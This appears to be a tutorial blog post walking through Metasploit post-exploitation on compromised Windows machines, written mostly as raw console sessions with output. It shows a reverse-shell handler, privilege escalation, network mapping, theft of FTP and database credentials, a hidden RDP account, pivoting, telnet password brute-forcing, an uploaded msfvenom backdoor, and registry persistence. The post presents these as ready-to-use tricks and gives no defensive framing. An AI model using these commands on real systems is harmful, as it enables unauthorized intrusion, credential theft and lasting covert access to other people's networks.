Hello there,This is my first OP3N submission and we'll talk about post exploitation hacking techniques you can use after having a meterpreter shell on a remote system. You'll see things like:
- Privilege Escalation
- Maintaining Access
- Data Harvesting
- Weak Password Cracking
NOTE: Don't take this guide as standard methodology. The purpose is to show different "tips and tricks" you can use in post exploitation phases.Start the HandlerWe're assuming we already have a backdoor installed on the remote system. Let's have our handler running and waiting for remote connections:
msf > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcpPAYLOAD => windows/meterpreter/reverse_tcpmsf exploit(handler) > set LHOST 172.16.5.40LHOST => 172.16.5.40msf exploit(handler) > set LPORT 4466LPORT => 4466msf exploit(handler) > exploit[*] Started reverse handler on 172.16.5.40:4466[*] Starting the payload handler...[*] Sending stage (752128 bytes) to 10.32.120.15[*] Meterpreter session 1 opened (172.16.5.40:4466 -> 10.32.120.15:1034)
Privilege EscalationNow that we have our session running some privilege escalation commands, let's get higher privileges on the system:
meterpreter > getsystem...got system (via technique 1).meterpreter > getuidServer username: NT AUTHORITYSYSTEM
Map the NetworkAn easy way to map the internal network is by running arp_scanner module:
meterpreter > run arp_scanner –r 10.32.120.0/24[*] ARP Scanning 10.32.120.0/24[*] IP: 10.32.120.1 MAC 00:50:56:b1:eb:b8[*] IP: 10.32.120.8 MAC 00:50:56:b1:eb:9a[*] IP: 10.32.120.15 MAC 00:50:56:b1:eb:dd[*] IP: 10.32.120.17 MAC 00:50:56:b1:eb:de[*] IP: 10.32.120.13 MAC 00:50:56:b1:eb:dfmeterpreter >
As you see there are 5 total hosts on the network. Port ScanOnce we've listed all internal hosts, we need to run a TCP scan to check for open ports.That will help us to also identify the role of each system inside the network. To do that, we first need to background our current session and run the tcp_scanner module:
meterpreter > background[*] Backgrounding session 4...msf exploit(handler) > use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) > set RHOSTS 10.32.120.17RHOSTS => 10.32.120.17msf auxiliary(tcp) > run[*] 10.32.120.17:139 - TCP OPEN[*] 10.32.120.17:135 - TCP OPEN[*] 10.32.120.17:445 - TCP OPEN
Data HarvestingThere's a chain of commands for this purpose and we'll see a few of them.
Figured out installed application
meterpreter > run post/windows/gather/enum_applications[*] Enumerating applications installed on LS-WINXPInstalled Applications======================Name----FileZilla Client 3.5.3Microsoft Visual C++ 2008 Redistributable - x86Microsoft Visual C++ 2010 x86 RedistributableSecurity Update for Windows XP (KB958644)VMware ToolsWebFldrs XPVersion-------3.5.39.0.30729.414810.0.4021918.6.0.62619.50.7523[*] Results stored in:/root/.msf4/loot/20120314093539_default_10.32.120.15_host.application_729568.txtmeterpreter >
We find Filezilla runing on the system and already know that Metasploit has a module to get credentials from FTP software like Filezilla.
meterpreter > run post/multi/gather/filezilla_client_cred[*] Checking for Filezilla directory in: C:Documents andSettingsLSAdminApplication Data[*] Found C:Documents and SettingsLSAdminApplication DataFileZilla[*] Checking for Filezilla directory in: C:Documents andSettingsAdministratorApplication Data[*] Reading sitemanager.xml and recentservers.xml files from C:Documentsand SettingsLSAdminApplication DataFileZilla[*] Parsing sitemanager.xml[*]Collected the following credentials:[*]Server: 10.32.121.23:21[*]Protocol: FTP[*]Username: lsuser_ftp[*]Password: FTPStrongPwd[*] Parsing recentservers.xml[*]Collected the following credentials:[*]Server: 10.32.121.23:21[*]Protocol: FTP[*]Username: lsuser_ftp[*]Password: FTPStrongPwdmeterpreter >
We also found a new host with the IP: 10.32.121.23. Exploit the ServerIn the previous step, we discovered a new host with IP: 10.32.121.23 running a FTP service on it. Before getting more info about it, let's try to connect to this system by creating RDP user. For that, we have to interact with our running meterpreter shell and create a new RDP user. Plus, we have to start the RDP service on remote system.
meterpreter > shellProcess 1100 created.Channel 6 created.Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.C:Documents and SettingsLSAdmin> net user guest_1 guestpwd /addnet user guest_1 guestpwd /addC:Documents and SettingsLSAdmin> net localgroup "Remote Desktop Users"guest_1 /addnet localgroup "Remote Desktop Users" guest_1 /addThe command completed successfully.meterpreter > run getgui -e[*] Windows Remote Desktop Configuration Meterpreter Script byDarkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Enabling Remote Desktop[*] RDP is disabled; enabling it ...[*] Setting Terminal Services service startup mode[*] The Terminal Services service is not set to auto, changing it...[*] For cleanup use command: run multi_console_command -rc/root/.msf4/logs/scripts/getgui/clean_up__20120314.4155.rcmeterpreter >
We can login to it with :root@kali:~# rdesktop 10.32.120.15 -u guest_1After getting the RDP, you'll be asked also for the password.
Port ScanLet's run a TCP scan on the server to check further for open ports. To do that, we first need to add a route to the machine - we have to use victim 1 as a bridge.
meterpreter > run autoroute -s 10.32.121.0/24[*] Adding a route to 10.32.121.0/255.255.255.0...[+] Added route to 10.32.121.0/255.255.255.0 via 10.32.120.15[*] Use the -p option to list all active routesmeterpreter >
Now, we can run our scanner module:
meterpreter > background[*] Backgrounding session 2...msf exploit(handler) > use auxiliary/scanner/portscan/tcpmsf auxiliary(tcp) > set RHOSTS 10.32.121.23RHOSTS => 10.32.121.23msf auxiliary(tcp) > run[*][*][*][*][*][*]...10.32.121.23:21 - TCP OPEN10.32.121.23:23 - TCP OPEN10.32.121.23:80 - TCP OPEN10.32.121.23:139 - TCP OPEN10.32.121.23:135 - TCP OPEN10.32.121.23:445 - TCP OPEN
Web ServerPreviously, we found a web server running on intranet. We will port forward the server to us to access the site:
meterpreter > portfwd add -l 8001 -p 80 -r 10.32.121.23[*] Local TCP relay created: 0.0.0.0:8001 <-> 10.32.121.23:80meterpreter >
We should be able to access the internal web site by visiting localhost:8001Weak Password CrackingOn previous tasks, we found also port 23 open on 10.32.121.23 system. Without any service detection, we can figure out there's probably an Telnet service on. Let's try to crack the password using telnet cracker auxiliary:
msf auxiliary(tcp) > use auxiliary/scanner/telnet/telnet_loginmsf auxiliary(telnet_login) > set RHOSTS 10.32.121.23RHOSTS => 10.32.121.23msf auxiliary(telnet_login) > set PASS_FILE /root/Desktop/pwd.txtPASS_FILE => /root/Desktop/pwd.txtmsf auxiliary(telnet_login) > set USER_FILE /root/Desktop/username.txtUSER_FILE => /root/Desktop/username.txtmsf auxiliary(telnet_login) > set THREADS 15THREADS => 15msf auxiliary(telnet_login) > set USER_AS_PASS falseUSER_AS_PASS => falsemsf auxiliary(telnet_login) > set STOP_ON_SUCCESS trueSTOP_ON_SUCCESS => truemsf auxiliary(telnet_login) > exploit...[*] 10.32.121.23:23 TELNET - [00009/10000] - Banner: Welcome to MicrosoftTelnet Service login:[*] 10.32.121.23:23 TELNET - [00009/10000] - Prompt: netadmin password:[*] 10.32.121.23:23 TELNET - [00009/10000] - Result: The handle isinvalid. Login Failed login:[*] 10.32.121.23:23 Telnet - [00010/10000] - Attempting:'netadmin':'12345678'[*] 10.32.121.23:23 TELNET - [00010/10000] - Banner: Welcome to MicrosoftTelnet Service login:[*] 10.32.121.23:23 TELNET - [00010/10000] - Prompt: netadmin password:[*] 10.32.121.23:23 TELNET - [00010/10000] - Result: The handle isinvalid. Login Failed login:[*] 10.32.121.23:23 Telnet - [00011/10000] - Attempting:'netadmin':'abc123'[*] 10.32.121.23:23 TELNET - [00011/10000] - Banner: Welcome to MicrosoftTelnet Service login:[*] 10.32.121.23:23 TELNET - [00011/10000] - Prompt: netadmin password:[*] 10.32.121.23:23 TELNET - [00011/10000] - Result:*===============================================================Microsoft Telnet Server.*===============================================================C:Usersnetadmin>[+] 10.32.121.23 - SUCCESSFUL LOGIN netadmin : abc123[*] Attempting to start session 10.32.121.23:23 with netadmin:abc123[*] Command shell session 2 opened (Local Pipe -> Remote Pipe)[*] Auxiliary module execution completedmsf auxiliary(telnet_login) >
Uploading a Backdoor* Create a backdoor
root@kali:~# cd /pentest/exploits/framework3/root@kali:/pentest/exploits/framework3# ./msfvenomwindows/meterpreter/bind_tcp LPORT=2444 X > /root/Desktop/msf_bind.exeCreated by msfpayload (https://www.metasploit.com).Payload: windows/meterpreter/bind_tcpLength: 298Options: {"LPORT"=>"2444"}
Upload it to the remote system and execute it through telnet (as we have the credentials):
meterpreter > upload /root/Desktop/msf_bind.exe 'C:\Documents andSettings\LSAdmin\Local Settings\Temp\msf_bind.exe'[*] uploading : /root/Desktop/msf_bind.exe -> C:\Documents andSettings\LSAdmin\Local Settings\Temp\msf_bind.exe[*] uploaded: /root/Desktop/msf_bind.exe -> C:\Documents andSettings\LSAdmin\Local Settings\Temp\msf_bind.exemeterpreter >
Run the backdoor using the Telnet session
msf auxiliary(telnet_login) > sessions -i 2[*] Starting interaction with 2...C:>cd inetpubcd inetpubC:inetpub>cd ftprootcd ftprootC:inetpubftproot>msf_bind.exemsf_bind.exeC:inetpubftproot>
Next, we set up a new handler and wait for connections:
msf auxiliary(tcp) > use exploit/multi/handlermsf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcpPAYLOAD => windows/meterpreter/bind_tcpmsf exploit(handler) > set RHOST 10.32.121.23RHOST => 10.32.121.23msf exploit(handler) > set LPORT 2444LPORT => 2444msf exploit(handler) > exploit[*] Starting the payload handler...[*] Started bind handler[*] Sending stage (752128 bytes)[*] Meterpreter session 4 opened (172.16.5.40-10.32.120.15:0 ->10.32.121.23:2444)meterpreter >
Privilege EscalationNOTE: Don't forget - the first thing you want to do after gaining access to remote system is to escalate you privileges (after migration of course). Let's run one more:
meterpreter > getsystem...got system (via technique 4).meterpreter > getuidServer username: NT AUTHORITYSYSTEMmeterpreter >
Maintaining AccessGetting just high privileges isn't enough, right? Let's add a value in the registry in order to run our backdoor on startup so we can access the system any time we want:
meterpreter > reg setval -kHKLM\software\microsoft\windows\currentversion\run'"C:inetpubftprootmsf_bind.exe"' -v msf_bindSuccessful set msf_bind.meterpreter >-dWhere –k indicates the registry key path, -d the value of the value of the key and –v the name.
Data HarvestingWe know the system is running a web server and is probably connected to a database. Let's find usernames and passwords for this site. The easier way is by looking up the config file of the site by downloading it:
meterpreter > lsListing: C:inetpubwwwrootintranet====================================
Mode Size Type Name---- ---- ---- ----40777/rwxrwxrwx 0 dir .40777/rwxrwxrwx 0 dir ..100666/rw-rw-rw- 397 fil index.php100666/rw-rw-rw- 16899 fil licence.txt100666/rw-rw-rw- 9202 fil readme.html......100666/rw-rw-rw- 3982 fil wp-comments-post.phppost.php 3165 fil wp-config.php100666/rw-rw-rw- 0 dir wp-content......
meterpreter > download wp-config.php /root/Desktop/conf.php[*] downloading: wp-config.php -> /root/Desktop/conf.php/wp-config.php[*] downloaded : wp-config.php -> /root/Desktop/conf.php/wp-config.phpmeterpreter >
And, finally, the credentials we need:
DB NAME intranetDB USER rootDB PASSWORD LSMySqlDBPwd0905DB HOST 10.32.121.12
That's it for now, folks. Hope you find this useful!
